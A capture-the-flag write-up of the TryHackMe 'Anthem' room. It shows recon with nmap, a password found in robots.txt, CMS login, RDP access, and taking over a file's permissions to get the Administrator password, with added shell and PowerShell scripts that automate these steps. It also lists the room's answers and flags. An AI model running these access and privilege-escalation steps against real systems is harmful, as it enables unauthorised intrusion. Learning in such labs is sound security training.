Task 1: Website Analysis
I performed an nmap scan to find open ports on the machine.
$ nmap -A -T4 -p- 10.10.80.56 -Pn
This is what the nmap flags stand for:
-A: aggressive scan, i.e. enable OS detection, version detection, default script scanning, and traceroute
-T4: timing template 4. The templates range from 0 (paranoid: slow and stealthy) to 5 (insane: fast and noisy); 4 is the usual choice on a lab network
-p-: scan all 65535 Transmission Control Protocol (TCP) ports (1-65535) instead of nmap's default top 1000
-Pn: treat the host as online and skip host discovery, which matters on Windows targets that drop ICMP echo requests
[Screenshot: Results of the nmap scan, continued]
Question 2: What port is for the web server? 80
Question 3: What port is for remote desktop service? 3389
I decide to check out their website.
[Screenshot: Snippet of the website homepage]
Viewing the page source reveals nothing interesting, except perhaps the placeholder highlighted below:
[Screenshot: Page source with the odd placeholder]
From the nmap results above we know the site has a robots.txt with Disallow entries, so I open it.
Question 4: What is a possible password in one of the pages web crawlers check for? UmbracoIsTheBest!
I decide to view all the disallowed directories to see if I can find anything interesting. But first, I Google Umbraco.
Built upon Microsoft's .NET Framework, Umbraco is a completely free, Open Source Content Management System (CMS).
https://www.unskinned.net/umbraco-cms
So now I know the website is powered by Umbraco CMS.
Question 5: What CMS is the website using? Umbraco
Question 6: What is the domain of the website? Anthem.com
Visiting /bin returns a blank page. /config and /umbraco_client both redirect to the homepage. /umbraco, however, presents a login form.
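The robots.txt steps above (read the file, notice the line that is not a directive, then request each Disallow path and see whether it is blank, redirected or a real page) can be scripted. The script below is an added example and is not part of the original writeup; the SAMPLE_ROBOTS text is constructed from the four directories the writeup names plus the stray password line, and the live probe only runs when a host is given on the command line.

```shell
#!/bin/sh
# Added example (not from the original writeup): triage a robots.txt the way
# the steps above do by hand. Parsing works offline on SAMPLE_ROBOTS; the
# network probe only runs when a host is passed as the first argument.

# Constructed sample: the four Disallow entries the writeup visits, plus the
# stray non-directive line that held the password.
SAMPLE_ROBOTS='User-agent: *
UmbracoIsTheBest!
Disallow: /bin/
Disallow: /config/
Disallow: /umbraco/
Disallow: /umbraco_client/'

# Print every Disallow path, one per line. Directive match is case-insensitive,
# CRLF line endings are tolerated, and an empty "Disallow:" is skipped.
parse_disallow() {
    printf '%s\n' "$1" | tr -d '\r' \
        | awk -F': *' 'tolower($1) == "disallow" && $2 != "" { print $2 }'
}

# Print lines that are neither a known directive, a comment, nor blank.
# robots.txt should contain nothing else, so anything left over deserves a look.
unexpected_lines() {
    printf '%s\n' "$1" | tr -d '\r' \
        | grep -v -E '^[[:space:]]*(#|$)' \
        | grep -v -i -E '^[[:space:]]*(user-agent|disallow|allow|sitemap|crawl-delay):'
}

# Request each disallowed path WITHOUT following redirects and report the
# status code and Location, so a real page (200 with content), a bounce to the
# homepage (302) and a blank 200 can be told apart. Needs curl and network access.
probe_paths() {
    host="$1"; robots="$2"
    parse_disallow "$robots" | while IFS= read -r path; do
        printf '%-20s ' "$path"
        curl -s -o /dev/null -w '%{http_code} %{redirect_url}\n' "http://$host$path"
    done
}

# Usage: sh robots_triage.sh 10.10.80.56
if [ $# -ge 1 ]; then
    live="$(curl -s "http://$1/robots.txt")"
    echo "== lines that are not directives =="; unexpected_lines "$live"
    echo "== disallowed paths ==";              probe_paths "$1" "$live"
fi
```

Run against the sample data the two parsing functions return the four paths and the single odd line; against a live host the probe output is what you would otherwise collect by hand from the browser, one line per Disallow entry.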
[Screenshot: Login form at /umbraco]
I haven't found any login credentials on the site so far, so I Google whether Umbraco CMS has default credentials. None of them work.
I decide to do further recon.
Questions 7-8
It gets trickier here, as the room becomes more CTF-like. The administrator's name is not stated directly on the website, but the site contains enough information to work it out.
Using the site's search bar to look for anything related to "admin" turns up an article in the archives: IP/archive/a-cheers-to-our-it-department/
The article contains a strange poem.
[Screenshot: The poem in the article]
Let's Google it!
[Screenshot: Result of the Google search]
Question 7: What is the name of the Administrator? Solomon Grundy
Question 8 asks for the administrator's email address. Another article on the site reveals the email convention: the author's initials at the company domain.
[Screenshot: Deciphering the email pattern]
Since the administrator is Solomon Grundy, we can assume his address is SG@anthem.com
Question 8: Can we find the email address of the administrator? SG@anthem.com
I head back to the login page and enter the admin's email together with the password found in /robots.txt.
[Screenshot: Login form with credentials]
The credentials log us into the administration section of the Umbraco CMS.
[Screenshot: Umbraco CMS admin section]
Task 2: Spot the Flags
Flag 1: THM{L0L_WH0_US3S_M3T4}
I found flag 1 in the 'Meta Tags' section of the 'We are Hiring' blog post. See the image below.
Flag 2: THM{G!T_G00D}
I found this flag in the page source of the website.
Flag 3: THM{L0L_WH0_D15}
I found this flag by clicking Redirect URL Management and following the link /authors/jane-doe/
[Screenshot: Redirect URL Management page]
That takes me to Jane's author page, where the flag is.
[Screenshot: Jane's author page with the flag]
Flag 4: THM{AN0TH3R_M3TA}
I found flag 4 under the 'Meta Tags' section under one of the site's blog posts.
Task 3: Final Stage
Using the credentials found in Task 1, we can connect over RDP (Remote Desktop Protocol) to the Windows Server, which nmap showed listening on port 3389. Note that the RDP username is the local account sg, not the email address used for the Umbraco login.
$ rdesktop -u sg -p 'UmbracoIsTheBest!' 10.10.80.56
Username: sg Password: UmbracoIsTheBest!
And we are successful.
[Screenshot: Remote desktop of the Windows machine]
On the desktop we notice a user.txt file. Opening it gives another flag.
[Screenshot: The flag in user.txt]
Next we need to find the admin password. The hint given on TryHackMe is "It is Hidden", which points straight at hidden files. Use the search bar to find Control Panel and open File Explorer Options. Turn on Show hidden files, folders and drives and save the setting. As you might have guessed, some hidden files and folders are now visible. Go to the C:\ drive and look for anything strange. The folder backup looks promising, and it contains a file called 'restore'.
Here we get to the most interesting part. We can't read or write the file, but we can edit its permissions. This is not as odd as it looks: Windows lets a file's owner read and change its DACL even when the DACL grants the owner no access at all, so the Owner field in the Advanced security dialog is the first thing to check. Right-click the file, select Properties, open the Security tab, click Advanced, and add yourself (your username) with read permission, thereby granting yourself access to the file. If you need help, Google how to add a user in Permissions.
[Screenshot: How to add yourself as a user]
Finally, open the file and read the password.
Now we have to elevate our privileges to Administrator in order to read root.txt. I navigate to the Administrator's Desktop (see image below).
[Screenshot: File path to the Administrator Desktop]
When prompted for the password, I type in ChangeMeBaby1MoreTime and can now read the contents of root.txt.
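The same Task 3 steps can be done from a PowerShell prompt inside the RDP session instead of clicking through Explorer, which also makes the "why can we edit permissions on a file we cannot read" question answerable on the spot. The block below is an added example and is not from the original writeup; it assumes the hidden folder is C:\backup and the file is C:\backup\restore, as in the writeup, and takes root.txt to sit on the Administrator's Desktop, which is where the writeup navigates to.

```powershell
# Added example (not part of the original writeup): Task 3 from a PowerShell
# prompt in the RDP session as user sg.
# Assumptions: the hidden folder is C:\backup and the file is C:\backup\restore
# (both from the writeup); root.txt is assumed to be on the Administrator's Desktop.

# 1. List hidden entries in C:\ (what "Show hidden files" does in Explorer).
Get-ChildItem -Path C:\ -Force |
    Where-Object { $_.Attributes -band [IO.FileAttributes]::Hidden }

# 2. Check the owner and DACL before touching anything. A file's owner always
#    holds READ_CONTROL and WRITE_DAC implicitly, so the owner can read and
#    rewrite the DACL even when the DACL itself grants them nothing. That is
#    the usual reason a file is unreadable yet its permissions are editable.
$file = 'C:\backup\restore'
Get-Acl -Path $file | Format-List Owner, AccessToString

# 3. Grant the current user read access (the GUI "add yourself" step), then read it.
icacls $file /grant "$($env:USERNAME):(R)"
Get-Content -Path $file

# 4. Start a shell as Administrator with the recovered password, typed at the
#    prompt rather than left in the command history, and read root.txt from it.
$cred = Get-Credential -UserName 'Administrator' -Message 'Password from C:\backup\restore'
Start-Process -FilePath powershell.exe -Credential $cred `
    -ArgumentList '-NoExit', '-Command', 'Get-Content C:\Users\Administrator\Desktop\root.txt'
```

If step 2 shows an owner other than your own account and no Full Control or "Change permissions" entry for you, the icacls call in step 3 will fail with Access Denied; at that point the trick in the writeup would not work and you would need a different path to the file's contents.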
My biggest issue with the room is that it was a little too "ctfy" for my liking. This resulted in a lot of guess-work or peeking at other writeups because one was never sure what the next step is (I am a big believer that rooms should be realistic). Otherwise, I found it pretty okay. I especially liked how we needed to figure out the email convention of Anthem, and RDP-ing into the Windows machine (a first for me).
Further Research On My Part
Familiarize myself with RDP (Setup RDP on my machine, then access it using a different machine. From the same network and also from a different one. Figure out how to secure RDP too)
Next time I need a website, I will consider Umbraco. It looks better than WordPress.